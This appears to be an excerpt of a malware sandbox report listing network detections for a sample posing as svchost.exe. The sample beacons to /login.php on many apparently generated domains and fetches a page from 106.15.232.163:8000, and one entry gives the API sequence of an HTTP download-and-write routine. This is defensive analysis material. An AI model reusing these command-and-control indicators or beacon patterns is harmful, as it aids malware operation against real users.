Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comCookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comIf-Modified-Since: Wed, 22 Feb 2023 21:25:52 GMTIf-None-Match: "63f68860-251"
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comCookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; snkz=66.23.206.109
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0426-044d-b465-1d078f2f97da HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C839C0 memset,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,WriteFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02C839C0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0424-16c6-a16f-217434b104d2 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345856.5179536
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345856.5241611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
